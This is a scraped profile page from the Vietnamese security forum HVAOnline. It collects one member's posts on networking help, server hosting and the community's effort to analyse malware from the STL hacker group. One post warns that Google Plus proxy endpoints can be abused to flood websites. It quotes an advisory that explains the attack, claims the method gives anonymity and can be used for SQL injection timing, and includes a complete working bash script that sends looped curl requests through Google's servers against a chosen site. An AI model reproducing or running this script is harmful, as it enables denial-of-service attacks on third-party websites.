banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: ga_cum06  XML
Profile for ga_cum06 Messages posted by ga_cum06 [ number of posts not being displayed on this page: 0 ]
 
hehe.lâu lâu thấy 1 vụ xôm tụm à nha.e 1 vé nha a phúc
sẵn sàng tài trợ cho lớp học 1 vài con vps với đầy đủ các Os : CentOs ,Debian,Ubuntu,ArchLinux ...để đâm chọc thử nghiệm
@conmale : em thấy facebook cũng được viết bằng php, có phải nó mang hàm nghĩa 'toy' trong các enterprise-level
tình trạng được ghi nhận lúc 18h44p ngày 19/03/2013
truy cập https://3dsecure.acb.com.vn.
default page của tomcat luôn mới sợ
vài ảnh chụp được mọi người bình luận nhé. dây dưa với bọn ngân hàng mệt lắm.
[url=http://upanh.com/view/?id=avsf0a5z7fl]
[/url]
[url=http://upanh.com/view/?id=5vs62abz8fs]
[/url]
[url=http://upanh.com/view/?id=3vs5cafz7fz]
[/url]
[url=http://upanh.com/view/?id=4vsb2a3zafw]
[/url]
chưa hiểu cậu chiro8x đang nói đến ai smilie
@chiro8x :giải pháp tình thế nhưng kiểu giật gấu vá vai. hoặc có thể nó đếc sở hữu cái server đó chỉ là thằng Rsl . khóa domain khách hàng để bảo vệ cả server. bác chủ thớt liên hệ với mình vào inbox. dời thử sang server của mình. mình cũng đang muốn xem Ddos nó như thế nào smilie
1 dạng bài nên xoá :-<
cho thêm chữ hàng triệu để câu view đó mà smilie) vừa search google 1 số thứ về nginx đọc tin này trong blog của bác. vào hva lại thấy smilie)
@xnohat mình vẫn vào Godaddy bình thường. chỉ có điều là gần đây không giao dịch được qua paypal nữa.cũng đang thắc mắc không hiểu tại sao. có lẽ là do vụ này. Chặn Ip từ đông nam á và không tạm thời bỏ giao dịch qua Paypal vì sao ai cũng biết smilie
Đúng rồi anh ạ. Nhưng lúc em khởi tạo thì để nó ở mục thông báo bug.và trước khi mở topic hỏi về việc này em cũng đã xem thống kê các chủ đề đã tạo của em và chỉ có 1 (đáng lẽ ra phải là 2 nếu tính cả chủ đề vừa khôi phục).anh có thể cho em biết lý do ở đâu không smilie?
ngày 01/09/2012 tôi có đăng 1 topic thông báo về việc có nhiều tên miền .vn bị hack. không biết là do lỗi db của hva hay bị ban quản trị xoá vì vi phạm điều luật nào đó. xin có lời giải thích từ ban quản trị .
nếu mình không nhầm thì lớp Cryptography của Professor Dan Boneh mà bạn này đang học là do admin mrro giới thiệu cách đây cũng khá lâu rồi.Coursera quả thật là rất hay. mình cũng đăng kí 1 vài class smilie

PXMMRF wrote:


"không hiểu vì lý do gì mà không còn hiện IP nữa, báo lỗi disconnect"
Lý do là vì Router hay modem đã cấp đia chỉ IP riêng (prvate IP ) này (192.168.1.15) cho một máy khác trong mang LAN. Điều này thường xảy ra khi máy bạn và một số máy khác trong LAN cùng khởi đông lai và một số máy hoàn tất quá trình khởi động nhanh hơn máy của bạn.

Bạn phải áp dụng kỹ thuật "Bind Private IP (của máy) với Computername hay MAC Address (của máy-tức là của card mạng)" trong cấu hình của Router hay modem. Như vậy máy của bạn luôn có Private IP đã đươc Binded.

 

nếu như bạn đó đã config ip mà modem or Router đã cấp phát thì ngay sau khi đặt ip(bị trùng) đó, window sẽ báo lỗi ngay chứ bác.
tình trạng hiện thời của bạn có vẻ như là bạn chưa thể connect được tới modem và từ đó sẽ không có ip. bạn thử dùng 1 máy khác connect đến modem. nếu được => máy kia có vấn đề. nếu không được cắm thằng 2 máy (LAN) vào nhau nếu được thì modem có vấn đề....(nhớ dùng cái máy ngon ngon k thì loanh quanh chả biết lỗi ở đâu cả).
bạn thử kiểm tra xem đã cài GNOME chưa, nếu chưa thì :
# yum groupinstall "X Window System" "GNOME Desktop Environment"
có cả 1 hội những người ghét kênh 14 này : https://www.facebook.com/pages/H%E1%BB%99i-nh%E1%BB%AFng-ng%C6%B0%E1%BB%9Di-gh%C3%A9t-k%C3%AAnh-14/190200307680911.
tuyệt vời, công nghệ hiện đại, nhanh chóng. mình đi order mất tiền mấy nơi mà vẫn phải chờ confirm dùng tạm cái này vậy,mỗi tội k hỗ trợ FTP :-ss. ngon thì order hehe
@chiro8x: có lẽ bạn chưa đọc kí bug này, đây là lỗi của server google plus chứ ko phải bot google smilie
em scan thử bằng kis 2011 bản quyền vừa cập nhật hôm nay ko thấy báo gì cả


Nội quy diễn đàn HVAOnline

HVAOnline là diễn đàn phi lợi nhuận, phi tôn giáo, phi chính trị. Diễn đàn được lập ra với mục đích chia sẻ, trao đổi kiến thức và kinh nghiệm. Để HVAOnline là một nơi sinh hoạt lành mạnh và bổ ích, thành viên cần lưu ý những điểm như sau:................................

 


mỗi khi vào đăng nhập vào diễn đàn em đều thấy cái này, có vẻ như dạo này bác TQN hơi bận RCE , ít viết thêm các phân tích chuyên môn nên topic bắt đầu có vẻ lạc đề hay sao ý nhỉ ?
12:18 13/09/2011 vẫn chưa khắc phục lỗi trên. vẫn get về file p.txt
đọc thấy buồn cười : bạn sell này mới có 3 bài post trên hva mới đăng kí ngày 10/08/2011 vậy mà vào topic này để phát ngôn với ngụ ý gây diễn biến hoà bình trong mem hva chăng?

Chắc bạn biết câu "Chó cứ sủa và đoàn người cứ đi" chứ ?

cách bạn đặt nick làm cho m thấy có vẻ bạn thuộc thế hệ 9x. cũng có đủ các tính cách bồng bột cay cú của STL? bạn là ai, bạn như thế nào, bạn đã truy cập vào hva bao nhiêu lần từ ip đó chắc admin biết dễ dàng thôi mà. Nếu bạn là ng dùng bt thì chắc ip của bạn chả mấy khi thay đổi đâu nhỉ.nhiều cái sẽ đc tìm ra thôi!
mà m thấy bạn so sánh cũng thể hiện độ nguy hiểm của bạn : TQN và a ni mao hay lulsecz,. mang 2 khái niệm về 2 kiểu người khác nhau để so sánh với nhau quả là buồn cười smilie)1 bên là 1 nhóm (có lẽ bạn ko nguy hiểm đến mức độ ko biết điều này) 1 bên là 1 người. 1 bên là hacker làm điều k hay , 1 bên là người RCE để bảo vệ lẽ phải.và thêm 1 điều này nữa nhé : dù cho lulsecz hay a ni mao hay ai đi chăng nữa vào hva cũng k được sự tôn trọng của đa phần các mem = TQN đâu....đọc xong rồi tự hiểu về độ nguy hiểm của mình nhé smilie
sáng nay em get thế này vẫn ổn áp
https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=/hvaonline/posts/list/39969.html&container=focus
Xin admin và các anh em chú ý : hiện nay đang có 1 lỗi của Google có thể khai thác lợi dụng server của google để DDos, lỗi em đã thông báo tại đây :
/hvaonline/posts/list/39969.html
đến sáng nay khi get :
https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=/hvaonline/posts/list/39969.html&container=focus
có trả về file p.txt
em upload : http://www.mediafire.com/?uj6xngk695buxvx
rõ ràng hva vẫn chưa chặn kiểu tấn công này

How does it work?
The vulnerable pages are “/_/sharebox/linkpreview/“ and “gadgets/proxy?“
Is possible to request any file type, and G+ will download and show all the content. So, if you parallelize so many requests, is possible to DDoS any site with Google bandwidth. Is also possible to start the attack without be logged in G+.
Attack vectors:
The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs.
But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/
Also the Sql injection Time attack will work using this method.
DDoS attack is just an example, do not start ddos for no reason
Pratical examples:
https://plus.google.com/_/sharebox/linkpreview/?c=<SITE>&t=1&_reqid=<RANDOM_NUMBERS>&rt=j
or
https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=<SITE>&container=focus

code
#!/bin/bash

# Bug found by #
# Simone 'R00T_ATI' Quatrini #
# Mauro 'epicfail' Gasperini #
# Site: http://www.ihteam.net #

function start {
echo "[*] Sending `echo $2` Requests..."

for a in `seq $2`
do
id=$((RANDOM%3999999+3000000))
nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
done

echo "[*] Still attacking `echo $urlclear`"
echo "[*] Sleeping for 10 Seconds"
sleep 10
start url $2 urlclear
}

echo ''
echo ' 88888888ba, 88888888ba, ad88888ba '
echo ' aa 88 `"8b 88 `"8b d8" "8b '
echo ' 88 88 `8b 88 `8b Y8, '
echo 'aaaa88aaaa 88 88 88 88 ,adPPYba, `Y8aaaaa, '
echo '""""88"""" 88 88 88 88 a8" "8a `"""""8b, '
echo ' 88 88 8P 88 8P 8b d8 `8b '
echo ' "" 88 .a8P 88 .a8P "8a, ,a8" Y8a a8P '
echo ' 88888888Y"" 88888888Y"" `"YbbdP"" "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
echo "Usage: $0 <big file> <Requests>"
echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
echo ""

exit 0
fi

case $2 in
*[!0-9]* ) echo "$2 is not numeric" && exit 1;;
esac

echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1

url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""

start url $2 urlclear
 

Các bác có thông tin gì thêm về việc này không. từ ngày hva bị DDos đến vietnamnet cứ đi đâu nhìn thấy chữ này là mình sôi cả tiết, các anh STL có thấy thì bỏ qua nhé. Đừng thực hành làm gì smilie)
cũng chả có gì đâu mà có lỗi smilie search google cái là ra mà, kiếm được trang ngon hí hửng lên share anh em là đúng rồi.
chả hiếu bọn STL tiềm năng của nó đến đâu ??? hay nó đang chỉ dùng đòn giương đông kích tây hoặc trò gì đó mà đợt gần đây cả vietnamnet và trang web đề cập ở đây http://www.bbc.co.uk/vietnamese/vietnam/2011/08/110823_viettan_ddos.shtml cũng bị tấn công. Ai có thông tin gì thêm thì post cho mọi người với
ông này hay thật nhỉ tôi post web này trước smilie) tự nhiên mở hẳn topic riêng giới thiệu mỗi trang web là sao, phí tài nguyên quá

TQN wrote:
Không cần thiết viết thêm đâu anh, chỉ cần ghi chú là bà con login hay RunAs file cmd trên với quyền Admin là được. Chạy 1 lần, press any key vài lần, sau đó login vào user thường dùng, chạy 1 lần, press any key vài lần nữa là xong.
- taskkill: Kill process đang run của exe cần del.
- sc delete: Delete service mà exe cần kill đăng ký
- Xong xuôi, del nó đi là vừa.

Em xin báo cáo với mấy anh stl, Avira vừa report về cho em, toàn bộ AcrobatUpdater.exe, SbieSvc.exe, SbieMgm.dll mà em đã up cho Avira đã được Avira báo là "mèo què".

Thêm nữa, chiều nay, KIS của em tự đông nhai xương hết toàn bộ mấy file trên trong thư mục: Virus\STL trên máy em rồi.

Từ từ rồi toàn bộ 100% các "mèo què" của mấy anh sẽ bị các AVs phổ biến tiêu diệt hết. Thử xem lúc đó mấy anh còn "đốt chích" được ai.

PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em smilie smilie smilie smilie

 

lại còn dám doạ nạt cả thường dân vô tội . Đúng là người làm chuyện nhớn có khác chả từ thủ đoạn nào cả, nếu như chúng nó có bộ phận đảm nhiệm việc chuyên đi doạ nạt người khác thì không nó làm gì.Còn vì bức xúc với việc bị tụt quần code mà đem lòng ghen ghét hay (sợ hãi) gì thì đúng là bọn đầu lợn smilie). người đã làm thì không sợ mà nếu sợ chúng nó thì đã chả dám làm.

@TQN : hôm trước em tập RCE mấy cái File jad tìm được web này có khá nhiều tool RCE
http://www.woodmann.com chia sẻ mọi người cùng tham khảo
Link Tham khảo các Tool : http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools
Nói chung là dù có thế nào , dù có tấn công hay ko tấn công vào Hva thì STL đã tuyên chiến với cộng đồng mạng rồi. Có hăm doạ hay Pờ lì năn nỉ đi nữa thì cũng không thể ngừng cuộc chiến này được smilie. e nghĩ chắc giờ đây có khá nhiều ng đang âm thầm theo dõi và tìm cách tiêu diệt STL th smilie..... nhớ có câu ngày xưa xem phim chưởng "Đạo cao 1 thước ma cao 1 trượng " smilie nhưng cũng luôn có câu "Tà không thể thắng chính " smilie

Bác TQN có mail hay gì cho em phát em xin bác vài thứ cái ạ smilie) nói ở đây ko tiện smilie)

conmale wrote:

acoustics89 wrote:
Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi.
nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác

Các anh có ý kiến gì để làm việc hiệu quả hơn không 


Anh nghĩ có 3 mảng để lo:

1. RE.
2. Trace net và xác định mạng hoạt động của malware.
3. Report cho các nhóm antiviruses và các nhóm chức năng.

Nếu cần làm việc hữu hiệu có lẽ cần phải tạo một group list (dùng google group chẳng hạn). Trong đó, thành viên của nhóm liên lạc qua group và chỉ nên công bố thông tin trên diễn đàn sau khi tìm ra kết quả hoặc nếu cần các thành viên trên diễn đàn đóng góp thêm thông tin, mẫu mã. 


em cũng vừa nghĩ đến vấn đề này, thà rằng tạo 1 team âm thầm làm việc và chỉ public khi công việc đến mức độ nào đó. em thấy các anh cứ làm việc rồi lại mất ngồi post lên thế này khá mất thời gian smilie mà lại đánh rắn động cỏ ...nếu được em xin 1 chân ở trong group nào đó smilie
Ý kiến của em là nên lập 1 nhóm tuyên truyền .Hướng dẫn kĩ thuật tìm và diệt malware, cho member ở các forum khác. các phần mềm đã bị fake nên có hướng dẫn cụ thể đâu là thật đâu là giả và lấy từ nguồn nào tốt nhất,chắc chắn chúng ta không thể loại hoàn toàn được malware của STL nhưng cũng đỡ đi phần nào, để chúng nó thấy anh em hva cũng biết cách phản công chứ không chỉ ngồi phân tích cái đống code của chúng. Đã đến lúc mọi người chung tay góp sức, làm việc có kế hoạch và bài bản để đạt được kết quả cao nhất smilie smilie
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|